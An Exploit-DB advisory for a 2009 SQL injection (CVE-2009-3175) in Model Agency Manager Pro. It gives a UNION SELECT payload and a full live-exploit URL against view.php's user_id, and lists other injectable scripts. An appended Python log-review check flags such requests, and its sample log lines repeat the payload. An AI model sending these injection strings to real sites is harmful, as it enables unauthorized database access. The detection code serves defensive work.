Model Agency Manager Pro user_id SQL Injection Vulnerability

2009-09-09T00:00:00
ID EDB-ID:9603
Type exploitdb
Reporter R3d-D3V!L
Modified 2009-09-09T00:00:00

Description

Model Agency Manager Pro (user_id) SQL Injection Vulnerability. CVE-2009-3175. Webapps exploit for php platform

                                        
[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{In the name of God, the Most Gracious, the Most Merciful}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
[☠]
[~] Type:(view.php user_id) Remote SQL Injection Vulnerability
[☠]
[~] Vendor: www.phpmodelagencyscript.com
[☠]
[☠] Software: Model Agency Manager PRO
[☠]
[☠] author: ((я3d D3v!L))
[☠]
[☠] Date: 7.9.2009
[☠]
[☠] Home: CL0S3D
[☠]
[☠] contact: X@hotmail.co.jp
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠

[☠] Exploit:

[☠] XxX/view.php?user_id= EV!L !NJECT
[☠] (EV!L !NJ3c7):1%20union%20select%20user(),2,3,4/*&view=photos

[☠] L!VE Exploit:
http://model-agency-manager-pro.phpmodelagencyscript.com/view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos
[☠]MORE ER0RR:
photos.php?user_id=((я3d D3v!L))

motm.php?user_id=((DEV!L-Ro007))
forum_message.php?id=((STr0KE))
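
Added example, not part of the original advisory: a log-review check that flags requests to the four scripts named above whose id parameter is not a plain integer. It assumes these parameters are numeric record ids and that the server writes combined-format access logs; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> id parameter, as listed in the advisory above.
# Assumption: each of these parameters is meant to carry a numeric record id.
ID_PARAMS = {
    "view.php": "user_id",
    "photos.php": "user_id",
    "motm.php": "user_id",
    "forum_message.php": "id",
}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def non_integer_id(target):
    """Return (script, param, decoded value) if the id is not a plain integer, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    param = ID_PARAMS.get(script)
    if param is None:
        return None
    # parse_qs percent-decodes values; keep_blank_values so "user_id=" is seen too.
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if not re.fullmatch(r"[0-9]{1,10}", value):
            return (script, param, value)
    return None

def flag_requests(log_lines):
    """Collect every request whose id parameter fails the integer allowlist."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        hit = non_integer_id(m.group(1)) if m else None
        if hit:
            hits.append(hit)
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Sep/2009:10:00:01 +0000] "GET /view.php?user_id=12&view=photos HTTP/1.1" 200 5120',
    '192.0.2.77 - - [09/Sep/2009:10:00:05 +0000] "GET /view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos HTTP/1.1" 200 5342',
    '192.0.2.10 - - [09/Sep/2009:10:00:09 +0000] "GET /forum_message.php?id=7 HTTP/1.1" 200 2210',
    '192.0.2.77 - - [09/Sep/2009:10:00:12 +0000] "GET /motm.php?user_id=3%27 HTTP/1.1" 500 310',
]

if __name__ == "__main__":
    for script, param, value in flag_requests(SAMPLE_LOG):
        print(f"{script}: {param}={value!r}")
```

Log review only surfaces attempts. The same integer allowlist belongs in the PHP code itself, together with parameterized queries for these parameters.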


# milw0rm.com [2009-09-09]